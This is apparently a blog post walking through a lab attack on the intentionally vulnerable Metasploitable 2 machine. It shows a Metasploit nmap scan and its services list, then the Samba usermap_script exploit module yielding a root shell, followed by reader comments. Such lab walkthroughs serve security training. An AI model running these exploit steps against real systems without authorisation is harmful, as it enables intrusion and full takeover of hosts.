Strona główna > Metasploit > Rapid7 – Metasploitable 2

Rapid7 – Metasploitable 2

Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. (read all)

Metasploitable 2 running on VMware  looks like this:



Here we go


Check the version

msf > version
Framework: 4.4.0-dev.15205
Console  : 4.4.0-dev.15168
msf >

Connect to the database:

Connect To DataBase

Connect To the DataBase

Now we should be able to enter the db_nmap command from within msfconsole to run nmap and have its results automatically stored in our new database.

msf > db_nmap -sS -A



[*] Nmap: MAC Address: 00:0C:29:BF:08:FB (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS details: Linux 2.6.9 – 2.6.31
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   Name: WORKGROUP\Unknown
[*] Nmap: |_  System time: 2012-06-14 21:07:53 UTC-4
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.44 ms
[*] Nmap: OS and Service detection performed. Please report any incorrect results at .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds
msf >


msf > services


host             port  proto  name         state  info
—-             —-  —–  —-         —–  —-  21    tcp    ftp                                   open   vsftpd 2.3.4  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1
protocol 2.0  23    tcp    telnet       open   Linux telnetd  25    tcp    smtp         open   Postfix smtpd  53    tcp    domain       open   ISC BIND 9.4.2  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2  110   tcp    pop3-proxy   open   AVG pop3 proxy broken  111   tcp    rpcbind      open   2 rpc #100000  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP  512   tcp    exec         open   netkit-rsh rexecd  513   tcp    login        open  514   tcp    shell        open  1099  tcp    jrmi         open   GNU Classpath grmiregistry  1524  tcp    ingreslock   open  2049  tcp    nfs          open   2-4 rpc #100003  2121  tcp    ccproxy-ftp  open  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 – 8.3.7  5900  tcp    vnc          open   VNC protocol 3.3  6000  tcp    x11          open   access denied  6667  tcp    irc          open   Unreal ircd  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Let’s search for a Samba exploit and try it against the system:

msf>search samba

search samba

msf>search samba

The first shot is:

msf > use exploit/multi/samba/usermap_script

msf  exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                        yes       The target address
RPORT  139              yes       The target port

Exploit target:

Id  Name
—  —-
0   Automatic

msf  exploit(usermap_script) > set RHOST
msf  exploit(usermap_script) > exploit




I’m „super user”

uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

  1. Czerwiec 25, 2012 o 10:41 am

    Wow that was odd. I just wrote an extremely long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say wonderful blog!

  2. Październik 17, 2012 o 8:07 am

    Good day! Do you use Twitter? I’d like to follow you if that would be ok. I’m definitely
    enjoying your blog and look forward to new posts.

  3. Październik 17, 2012 o 9:25 pm

    Hey! This is my first comment here so I just wanted to give
    a quick shout out and say I truly enjoy reading your
    blog posts. Can you recommend any other blogs/websites/forums that go over the
    same topics? Thanks for your time!

  1. Czerwiec 15, 2012 o 7:51 pm


Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:


Komentujesz korzystając z konta Wyloguj / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Wyloguj / Zmień )

Zdjęcie na Facebooku

Komentujesz korzystając z konta Facebook. Wyloguj / Zmień )

Zdjęcie na Google+

Komentujesz korzystając z konta Google+. Wyloguj / Zmień )

Connecting to %s

%d blogerów lubi to: